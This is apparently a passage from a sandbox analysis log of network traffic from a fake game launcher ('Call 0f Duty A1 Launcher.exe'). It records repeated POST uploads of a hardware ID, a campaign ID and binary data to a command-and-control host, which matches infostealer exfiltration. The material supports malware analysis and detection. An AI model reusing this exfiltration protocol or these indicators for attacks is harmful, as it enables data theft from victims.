Ascii: BXBFWQ+Q6IUT1RHKH/bT2pv7zxt2csl+doyLEfTXzxJDKAUfT9HinUGFWuIf9N/fgLT1VmMz0z52isFGvtvHHEYjClwJmveFE9sXxAji3d2c9d0ccnvJd3qPhBn6k4xfQjBFB0Gw6I4N1w3BWvuWytbxw1YkPc5/dYeFEPDXzhlLJQpZC5HijwnVG8wR69jWm/LJGn14ijAxgZleppPsGEY6R2oCn+uCF50FjwOk39/Wro8YeXLYf2ODjwzy1sQ
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 32 6f 43 6e 2b 75 43 46 35 30 46 6a 77 4f 6b 33 39 2f 57 72 6f 38 61 64 58 33 42 64 48 57 47 68 68 50 37 30 4d 55 63 53 43 38 50 55 51 61 56 36 59 77 4d 32 78 72 47 48 75 48 4b 31 70 2f 36 77 31 59 79 50 63 31 6d 4d 64 37 42 4d 66 6e 46 77 54 42 47 4f 51 77 66 48 74 2f 38 78 51 62 52 57 70 6c 61 34 39 33 62 6e 66 44 48 46 6d 35 34 78 48 56 77 6a 49 63 66 38 39 2f 45 48 30 51 6f 41 31 4d 42 6c 75 4b 58 45 39 67 63 30 78 43 6b 6c 70 4f 52 37 6f 39 4f 50 45 76 61 61 57 43 51 77 79 76 39 33 63 77 59 55 32 67 61 45 52 6a 52 34 6f 6c 42 68 56 72 4b 47 75 6a 66 32 35 44 79 78 78 6c 7a 64 4e 68 2f 66 59 69 54 47 66 37 61 7a 42 42 4a 49 51 68 59 44 4a 72 76 69 41 58 61 47 34 46 55 70 4e 2f 4c 31 71 36 50 49 47 78 77 78 6c 42 36 69 6f 68 65 34 5a 33 62 58 30 49 6b Data Ascii: 2oCn+uCF50FjwOk39/Wro8adX3BdHWGhhP70MUcSC8PUQaV6YwM2xrGHuHK1p/6w1YyPc1mMd7BMfnFwTBGOQwfHt/8xQbRWpla493bnfDHFm54xHVwjIcf89/EH0QoA1MBluKXE9gc0xCklpOR7o9OPEvaaWCQwyv93cwYU2gaERjR4olBhVrKGujf25DyxxlzdNh/fYiTGf7azBBJIQhYDJrviAXaG4FUpN/L1q6PIGxwxlB6iohe4Z3bX0Ik
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 6e 6b 69 77 37 63 48 73 51 66 34 4e 2f 58 6b 50 6d 50 57 44 78 36 30 6a 34 70 78 71 34 35 79 35 48 6a 4a 51 55 33 53 30 5a 42 6c 75 6e 46 57 5a 30 57 77 68 62 73 31 39 57 66 2b 73 55 66 64 33 48 42 65 6e 32 50 68 42 6a 2f 31 73 63 65 51 53 51 50 57 51 4b 53 36 6f 6f 4f 31 56 71 50 57 75 50 41 6b 38 36 32 36 67 46 33 63 38 77 2b 62 73 69 59 58 76 6e 66 67 6b 63 46 4a 41 78 5a 42 35 54 70 68 41 66 56 48 38 6b 65 35 64 37 56 6c 66 6e 4c 45 33 31 79 7a 6e 4a 2f 6a 49 41 66 38 74 6a 4e 46 45 42 6f 53 78 38 47 69 61 58 64 51 65 77 5a 31 77 33 30 31 4a 4f 4a 75 4e 5a 57 65 33 47 4b 4a 6a 47 48 6b 78 54 30 33 63 63 51 51 43 73 4b 57 41 79 58 36 59 38 49 31 52 7a 4f 45 2f 62 62 33 35 6a 78 77 52 70 79 63 4d 42 39 66 4d 62 50 58 76 6e 4c 67 6b 63 46 42 41 4a 53 4c Data Ascii: nkiw7cHsQf4N/XkPmPWDx60j4pxq45y5HjJQU3S0ZBlunFWZ0Wwhbs19Wf+sUfd3HBen2PhBj/1sceQSQPWQKS6ooO1VqPWuPAk8626gF3c8w+bsiYXvnfgkcFJAxZB5TphAfVH8ke5d7VlfnLE31yznJ/jIAf8tjNFEBoSx8GiaXdQewZ1w301JOJuNZWe3GKJjGHkxT03ccQQCsKWAyX6Y8I1RzOE/bb35jxwRpycMB9fMbPXvnLgkcFBAJSL
2024-11-23 14:06:02 UTC	968	IN	Data Raw: 54 32 41 6a 54 57 71 71 59 31 49 36 32 6c 31 5a 4b 65 74 70 75 63 73 53 77 43 50 33 46 79 52 4a 4a 61 42 6f 52 47 4e 48 69 69 55 47 46 57 73 63 56 37 64 76 63 6c 2f 2f 44 47 33 6c 30 7a 33 39 33 67 6f 73 55 2f 74 58 45 48 6b 41 69 42 6c 34 4c 6d 4f 4b 4e 42 74 34 49 67 56 53 6b 33 38 76 57 72 6f 38 2f 65 32 2f 45 62 6a 47 5a 7a 77 65 2b 31 4d 35 66 48 57 67 42 56 51 36 56 34 6f 6b 48 32 42 7a 4d 47 2b 76 5a 30 35 6e 79 78 42 39 36 66 4d 64 37 66 49 4b 54 46 50 58 63 7a 68 5a 4a 4a 55 55 52 51 5a 62 39 78 56 6d 64 4b 38 77 55 36 74 2f 46 31 75 6d 42 44 7a 78 36 78 6a 34 70 78 6f 41 53 38 64 44 4e 48 45 59 70 44 30 30 54 6e 65 79 4e 42 4e 45 52 7a 78 7a 32 33 74 79 66 39 63 77 66 65 33 58 47 64 48 4b 42 77 56 43 2b 31 4e 70 66 48 57 67 6d 53 42 47 63 70 5a Data Ascii: T2AjTWqqY1I62l1ZKetpucsSwCP3FyRJJaBoRGNHiiUGFWscV7dvcl//DG3l0z393gosU/tXEHkAiBl4LmOKNBt4IgVSk38vWro8/e2/EbjGZzwe+1M5fHWgBVQ6V4okH2BzMG+vZ05nyxB96fMd7fIKTFPXczhZJJUURQZb9xVmdK8wU6t/F1umBDzx6xj4pxoAS8dDNHEYpD00TneyNBNERzxz23tyf9cwfe3XGdHKBwVC+1NpfHWgmSBGcpZ
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 32 66 34 37 0d 0a 64 37 42 48 30 41 36 42 45 30 4f 6d 75 43 47 42 64 49 56 7a 52 4c 75 6d 4a 33 57 38 64 64 57 4a 44 33 6d 66 57 43 4d 77 7a 6e 6b 78 63 55 54 56 43 4d 49 55 30 47 4f 71 35 78 42 32 68 61 42 51 71 54 59 30 70 76 6b 79 68 64 32 64 38 64 32 66 6f 4f 45 45 66 72 58 79 52 46 58 4a 67 70 66 42 35 72 6b 67 41 4c 57 45 4d 38 54 39 70 69 64 31 76 48 58 56 69 51 39 34 47 56 77 69 34 31 63 30 4e 6a 55 47 41 63 4a 43 31 51 47 6e 66 50 46 48 70 4d 44 67 52 33 6f 6d 49 76 57 2f 38 45 61 66 33 72 43 64 6e 53 47 69 68 37 78 32 63 77 59 56 79 49 4a 56 52 4f 65 35 6f 67 46 30 42 44 45 45 2f 62 64 32 70 43 32 67 56 5a 37 5a 59 6f 6d 4d 62 36 4b 45 4d 7a 51 32 56 39 61 5a 68 77 66 42 70 32 6c 33 55 48 65 48 63 49 62 37 74 48 66 6d 66 48 4c 42 48 5a 36 32 48 Data Ascii: 2f47d7BH0A6BE0OmuCGBdIVzRLumJ3W8ddWJD3mfWCMwznkxcUTVCMIU0GOq5xB2haBQqTY0pvkyhd2d8d2foOEEfrXyRFXJgpfB5rkgALWEM8T9pid1vHXViQ94GVwi41c0NjUGAcJC1QGnfPFHpMDgR3omIvW/8Eaf3rCdnSGih7x2cwYVyIJVROe5ogF0BDEE/bd2pC2gVZ7ZYomMb6KEMzQ2V9aZhwfBp2l3UHeHcIb7tHfmfHLBHZ62H
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 4c 50 54 51 7a 67 6c 49 4a 30 56 41 54 34 69 6c 67 67 32 64 51 6f 45 49 39 74 6a 59 6c 76 48 42 42 48 31 31 78 58 52 78 67 49 6f 55 2f 64 72 47 45 55 77 75 42 46 49 41 6b 4f 57 41 41 64 51 49 7a 46 71 71 6d 4e 53 4f 74 70 64 57 53 33 48 42 54 33 4b 51 77 51 47 77 79 6f 49 59 53 57 68 64 48 77 43 44 36 49 30 46 33 52 66 48 45 65 58 5a 30 4a 62 32 7a 42 5a 35 64 73 56 34 64 6f 75 4c 46 2f 66 42 79 68 74 58 4b 41 6c 62 51 64 2b 6c 67 68 6d 64 51 6f 45 71 35 39 50 66 6c 76 76 61 56 6d 4d 7a 30 7a 35 32 69 73 46 47 76 74 76 4a 46 45 4d 6a 42 6c 77 50 6d 75 2b 4b 44 74 63 63 78 78 4c 68 32 4e 2b 57 38 38 6b 53 65 48 50 4e 63 48 79 48 6b 78 33 33 6b 34 78 66 51 6a 42 46 42 30 47 78 37 70 4d 45 32 67 79 44 4c 2b 66 57 33 5a 48 67 6a 77 6c 44 4d 34 70 78 61 38 62 Data Ascii: LPTQzglIJ0VAT4ilgg2dQoEI9tjYlvHBBH11xXRxgIoU/drGEUwuBFIAkOWAAdQIzFqqmNSOtpdWS3HBT3KQwQGwyoIYSWhdHwCD6I0F3RfHEeXZ0Jb2zBZ5dsV4douLF/fByhtXKAlbQd+lghmdQoEq59PflvvaVmMz0z52isFGvtvJFEMjBlwPmu+KDtccxxLh2N+W88kSeHPNcHyHkx33k4xfQjBFB0Gx7pME2gyDL+fW3ZHgjwlDM4pxa8b
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 63 51 63 55 79 74 43 59 54 2b 78 37 6f 6b 43 30 52 76 47 57 71 71 59 33 4e 61 75 39 6c 5a 2f 62 39 67 78 59 4a 43 4d 44 76 6d 66 79 67 35 49 4a 45 55 52 51 64 33 68 6a 67 33 59 48 64 46 56 39 73 6a 59 6d 75 43 44 45 6d 34 39 68 44 35 67 6a 59 34 4d 38 4e 53 4e 44 6c 4d 6c 46 56 77 45 6c 71 6d 4e 45 4e 41 57 67 56 53 6b 7a 64 69 61 38 4d 49 44 4d 32 7a 63 66 57 65 42 7a 52 62 76 33 73 35 66 65 6d 5a 46 52 30 48 4a 70 62 41 43 30 78 54 47 44 50 57 56 38 35 33 36 7a 42 70 39 65 6f 6f 77 4d 59 44 42 52 71 32 64 67 68 74 55 61 46 30 50 55 38 71 77 31 6c 61 4e 53 4e 35 55 2f 5a 6a 46 31 71 36 64 57 44 78 76 69 69 59 78 77 59 49 4d 37 4e 58 42 43 55 5a 76 4f 32 45 41 6e 4f 72 4a 44 39 59 61 78 67 72 79 77 35 2b 65 39 64 55 4d 51 6b 50 68 63 6e 65 42 6d 78 6e 34 Data Ascii: cQcUytCYT+x7okC0RvGWqqY3Nau9lZ/b9gxYJCMDvmfyg5IJEURQd3hjg3YHdFV9sjYmuCDEm49hD5gjY4M8NSNDlMlFVwElqmNENAWgVSkzdia8MIDM2zcfWeBzRbv3s5femZFR0HJpbAC0xTGDPWV8536zBp9eoowMYDBRq2dghtUaF0PU8qw1laNSN5U/ZjF1q6dWDxviiYxwYIM7NXBCUZvO2EAnOrJD9Yaxgryw5+e9dUMQkPhcneBmxn4
2024-11-23 14:06:02 UTC	1369	IN	Data Raw: 59 2b 42 68 39 50 30 66 33 46 57 5a 30 37 79 77 72 70 31 39 54 57 75 49 38 53 50 43 57 4b 57 33 79 4c 68 42 44 35 6b 65 4d 56 56 53 55 4b 57 45 48 66 70 59 6c 42 68 56 72 41 45 50 54 56 33 4a 47 36 79 41 78 37 50 59 51 2b 66 38 62 5a 58 76 2f 5a 30 68 4a 4b 4c 30 6c 5a 44 35 2b 6c 6d 6b 2f 45 57 74 64 61 76 49 75 64 31 75 53 50 54 6a 77 36 78 48 4e 77 68 59 38 64 37 4d 48 45 48 46 4d 72 51 6d 45 2f 74 4f 69 49 42 4e 4d 64 2f 79 54 46 30 73 4f 62 2b 63 68 55 58 48 72 63 66 55 2b 34 74 67 2f 35 77 34 41 35 52 6a 34 47 48 30 2f 52 2f 63 56 5a 6e 54 76 4c 43 75 6e 58 31 4e 54 57 79 41 42 2f 50 59 51 2b 64 63 62 5a 58 74 76 65 7a 78 70 4c 4c 30 64 2b 43 34 48 6f 69 67 61 66 4f 73 59 4d 35 35 69 64 31 76 71 50 54 6a 78 38 77 47 35 38 69 59 5a 53 2b 63 6e 46 58 Data Ascii: Y+Bh9P0f3FWZ07ywrp19TWuI8SPCWKW3yLhBD5keMVVSUKWEHfpYlBhVrAEPTV3JG6yAx7PYQ+f8bZXv/Z0hJKL0lZD5+lmk/EWtdavIud1uSPTjw6xHNwhY8d7MHEHFMrQmE/tOiIBNMd/yTF0sOb+chUXHrcfU+4tg/5w4A5Rj4GH0/R/cVZnTvLCunX1NTWyAB/PYQ+dcbZXtvezxpLL0d+C4HoigafOsYM55id1vqPTjx8wG58iYZS+cnFX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:04 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8J0IL4TVRGUJQMNBHV3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18173 Host: property-imper.sbs
2024-11-23 14:06:04 UTC	15331	OUT	Data Raw: 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 4a 30 49 4c 34 54 56 52 47 55 4a 51 4d 4e 42 48 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 Data Ascii: --8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="pid"2--8J0IL4TVRGUJQMNBHV3Content-Disposition: form-data; name="lid"BVnUqo--@s
2024-11-23 14:06:04 UTC	2842	OUT	Data Raw: b6 ae 65 d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa Data Ascii: e,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)
2024-11-23 14:06:05 UTC	1019	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6qi3nhivjf1h465uuieq0igs3d; expires=Wed, 19-Mar-2025 07:52:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ySKgqg1pnfO1eIovEvx4dTPcG1BMwt2YPl%2FYWYkPJQK5SQpOihb8BRu6bVdEUAcwUaul7dK%2BZBleK5PnYrmIimUAPPSdO3D%2BoDouTbIHie4XkH8hnoXtSaXksDD%2FkYoLojPCggY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7bdcbae41a1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2050&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19138&delivery_rate=1377358&cwnd=224&unsent_bytes=0&cid=4635f15ba6c0cbff&ts=818&x=0"
2024-11-23 14:06:05 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:06:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:06 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3JDFRV3OG3YA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8752 Host: property-imper.sbs
2024-11-23 14:06:06 UTC	8752	OUT	Data Raw: 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 33 4a 44 46 52 56 33 4f 47 33 Data Ascii: --3JDFRV3OG3YAContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--3JDFRV3OG3YAContent-Disposition: form-data; name="pid"2--3JDFRV3OG3YAContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--3JDFRV3OG3
2024-11-23 14:06:07 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=51c0derht0k64pt8hacfvuv176; expires=Wed, 19-Mar-2025 07:52:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DFPvll9vswvtaE7c629Ts6Zh3S3B3in4igdr3fJOs2Sp0qLaPnxmDX54xOwmNRkE6OnEzEhJ2UkQ3boKVQXX2%2FsBlOAdJt4Mqvhfkx8ojKRQfOj5Msd%2BOa980AbZ%2Bnhz4jPEL8o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7cbcb538c4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2027&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9687&delivery_rate=1557333&cwnd=252&unsent_bytes=0&cid=ab8984f8914484bc&ts=767&x=0"
2024-11-23 14:06:07 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:06:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:08 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MKVFJJNDBTQSO0J User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20423 Host: property-imper.sbs
2024-11-23 14:06:08 UTC	15331	OUT	Data Raw: 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 4b 56 46 4a 4a 4e 44 42 54 51 53 4f 30 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 4d Data Ascii: --MKVFJJNDBTQSO0JContent-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--MKVFJJNDBTQSO0JContent-Disposition: form-data; name="pid"3--MKVFJJNDBTQSO0JContent-Disposition: form-data; name="lid"BVnUqo--@saschkaq--M
2024-11-23 14:06:08 UTC	5092	OUT	Data Raw: 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2024-11-23 14:06:09 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h1hrg2n38dgk6gumau7jaejia4; expires=Wed, 19-Mar-2025 07:52:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BNaXj4Trg8Ey3uZrlHMql191nK%2BmVSrdLrN5eRVGXoKa8If0lOXUXDMlVp0V7q5BQLHs0cqS2ztpCtZpgUzH2ZqdhlDXSP%2BRczegoxmpdxTysVv6fRS0tvL6QdKyMmTzlH5IQfQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7d98a785e82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21384&delivery_rate=1771844&cwnd=216&unsent_bytes=0&cid=76cefae6ab2a3d3b&ts=905&x=0"
2024-11-23 14:06:09 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:06:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.33.116	443	7328	C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:06:11 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=BNQFUY8T3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1214 Host: property-imper.sbs
2024-11-23 14:06:11 UTC	1214	OUT	Data Raw: 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 30 37 38 46 44 31 30 37 41 41 33 42 37 43 33 44 39 42 42 44 38 46 42 31 46 42 34 35 33 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 73 61 73 63 68 6b 61 71 0d 0a 2d 2d 42 4e 51 46 55 59 38 54 33 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --BNQFUY8T3Content-Disposition: form-data; name="hwid"8DA078FD107AA3B7C3D9BBD8FB1FB453--BNQFUY8T3Content-Disposition: form-data; name="pid"1--BNQFUY8T3Content-Disposition: form-data; name="lid"BVnUqo--@saschkaq--BNQFUY8T3Content-
2024-11-23 14:06:11 UTC	1022	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:06:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3qukkrp58pjigqdgsc6ah14lld; expires=Wed, 19-Mar-2025 07:52:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3t3zTro%2BhcWDi0kkQWn7pd9DqFLVaxe09Xv%2FOQlRP%2BfwlBEE%2Bj39FyCiSbj73iTnWcyAGaY9ccad%2BT4tzgIb8RFcWooZM62LR0HBPRMEVGE2KdR4y%2Fqb5TFGJCf%2BfuhmlOlkf4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71b7e94a8643c2-EWR alt-svc: h3=":443"; ma=86400 server-timing: 